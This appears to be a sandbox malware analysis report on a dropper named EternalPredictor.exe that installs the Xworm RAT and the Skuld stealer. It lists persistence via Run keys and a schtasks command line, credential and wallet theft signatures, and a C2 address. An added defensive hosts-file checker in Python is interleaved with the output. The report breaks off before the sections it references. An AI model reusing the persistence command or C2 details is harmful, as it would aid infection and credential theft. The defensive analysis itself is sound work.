Malware Analysis Report

2024-12-07 20:18

Sample ID 241117-l7p8jsxgjk
Target EternalPredictor.exe
SHA256 dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
Tags
skuld xworm persistence rat stealer trojan upx collection credential_access defense_evasion discovery execution privilege_escalation spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30

Threat Level: Known bad

The file EternalPredictor.exe was found to be: Known bad.

Malicious Activity Summary

skuld xworm persistence rat stealer trojan upx collection credential_access defense_evasion discovery execution privilege_escalation spyware

Xworm

Skuld stealer

Xworm family

Detect Xworm Payload

Skuld family

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Adds Run key to start application

Enumerates processes with tasklist

UPX packed file

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Views/modifies file attributes

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Gathers system information

Detects videocard installed

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 10:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win7-20240903-en

Max time kernel

132s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Skuld family

skuld

Skuld stealer

stealer skuld

Xworm

trojan rat xworm

Xworm family

xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {0EE67685-4353-4E85-98F5-1A8131D337A5} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp

Files

memory/1688-0-0x000007FEF58A3000-0x000007FEF58A4000-memory.dmp

memory/1688-1-0x0000000000B10000-0x0000000001CA6000-memory.dmp

C:\Users\Admin\AppData\Roaming\eternal.exe

MD5 7439cc991a9a756c41153b8e9121baab
SHA1 c62528386e5f62ff2975cc8ed0cad3a7d362e632
SHA256 31a2b821e933bb193d94438d4a5aa036519535336c936d65b66889fb03164e2d
SHA512 cbdfd77671884407f8f4bd9c5251df5d8896b29bd004ea52460eda8a222df7492c69572e044376315624220f3ea66de3aff34323ea281591ca2975f90fa6dd51

memory/2896-7-0x0000000000100000-0x0000000000118000-memory.dmp

memory/2896-8-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

\Users\Admin\AppData\Roaming\skuld.exe

MD5 dbbd2127d1030e4c9548fdf7de9983a7
SHA1 5b7939a94cbd908ad8f57bb2e5328cce657c3700
SHA256 8e3601302c0294914808b6537cd27de961d087ba0807590b981b7f8c8aa5eee6
SHA512 95a1112c9b062745df9c20f566cfcb9421221111d02db0c1a940a5ea230b09c39a487685ae674c350e4641132e3360a19ca0cd8762f7e46cecde8b7dd85fe5d2

\Users\Admin\AppData\Roaming\program.exe

MD5 3e6865657b29faea3a355c710f0aad45
SHA1 ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256 2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
SHA512 b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615

C:\Users\Admin\AppData\Local\Temp\_MEI27642\python313.dll

MD5 6ef5d2f77064df6f2f47af7ee4d44f0f
SHA1 0003946454b107874aa31839d41edcda1c77b0af
SHA256 ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367
SHA512 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266

memory/2008-48-0x000007FEF23F0000-0x000007FEF2A53000-memory.dmp

memory/2896-53-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/1368-59-0x0000000001370000-0x0000000001388000-memory.dmp

memory/2896-60-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2896-81-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/1808-84-0x0000000000140000-0x0000000000158000-memory.dmp

memory/2756-86-0x0000000000DE0000-0x0000000000DF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\program.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
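The signature above only records that program.exe and attrib.exe opened the hosts file for modification (the REG QUERY ... DataBasePath command line further down is how the sample locates it); it does not record what was written. The following Python is an added example, not part of the sandbox output: a hosts-file parser plus a check that flags sinkholed names, hijacked loopback names and watched domains pointed at some other address. The sample file content is constructed, and the default list of watched domain suffixes is an assumption to adjust for the environment.

```python
r"""Check a Windows hosts file for the kind of tampering this signature records.

Added example, not sandbox output. The report shows program.exe and attrib.exe
opening C:\Windows\System32\drivers\etc\hosts for modification but not what was
written, so SAMPLE_HOSTS below is constructed. watch_suffixes is an assumption.
"""
import ipaddress

# Names the stock hosts file may map to loopback without raising a flag.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "broadcasthost", "ip6-localhost", "ip6-loopback"}
# Addresses that make a name resolve to nothing: the usual way a stealer blocks AV/telemetry hosts.
SINKHOLE = {"0.0.0.0", "127.0.0.1", "::1", "::"}


def parse_hosts(text):
    """Return (ip, hostname, lineno) for every mapping; comments, blank lines and
    unparsable addresses are skipped, and one line may carry several hostnames."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()  # drop trailing comment, then tokenize
        if len(fields) < 2:
            continue
        try:
            ip = str(ipaddress.ip_address(fields[0]))  # normalises IPv4/IPv6 spelling
        except ValueError:
            continue
        entries += [(ip, name.lower().rstrip("."), n) for name in fields[1:]]
    return entries


def suspicious_entries(text, watch_suffixes=("microsoft.com", "windowsupdate.com")):
    """Flag sinkholed names, hijacked loopback names and watched domains sent elsewhere."""
    findings = []
    for ip, name, n in parse_hosts(text):
        if name in DEFAULT_NAMES:
            if ip not in SINKHOLE:
                findings.append({"line": n, "host": name, "ip": ip, "reason": "loopback name hijacked"})
            continue
        if ip in SINKHOLE:
            findings.append({"line": n, "host": name, "ip": ip, "reason": "sinkholed"})
        elif any(name == s or name.endswith("." + s) for s in watch_suffixes):
            findings.append({"line": n, "host": name, "ip": ip, "reason": "watched domain redirected"})
    return findings


# Constructed sample: the two comment lines mimic the stock header, the rest is made up.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#    127.0.0.1       localhost
127.0.0.1   localhost
::1         localhost
0.0.0.0     example-av-vendor.test   # security vendor sinkholed
0.0.0.0     telemetry.example.test
203.0.113.7 update.microsoft.com     # redirected to an attacker-controlled host
"""

if __name__ == "__main__":
    for f in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['reason']})")
```

On a live host, read the file from the path stored in the DataBasePath registry value rather than assuming the default location, because a sample that queries that value can also change it. Custom mappings that hit neither rule are still returned by parse_hosts for manual review.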

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" C:\Users\Admin\AppData\Roaming\skuld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
55 matches; indicator, process and target were not recorded for any of them

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Note: only reads of the NetSh key are recorded, and netsh.exe enumerates the helper DLLs registered there every time it starts. Here it was launched for "netsh wlan show profile" (see Command Line below), so these hits are a side effect of the Wi-Fi discovery, not evidence that the sample registered a helper DLL.

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\skuld.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 2736 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 2736 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 2736 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 4440 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 4440 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 2736 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2736 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3288 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3288 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 4568 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\system32\tree.com
PID 4568 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\system32\tree.com
PID 4544 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4208 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 4208 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
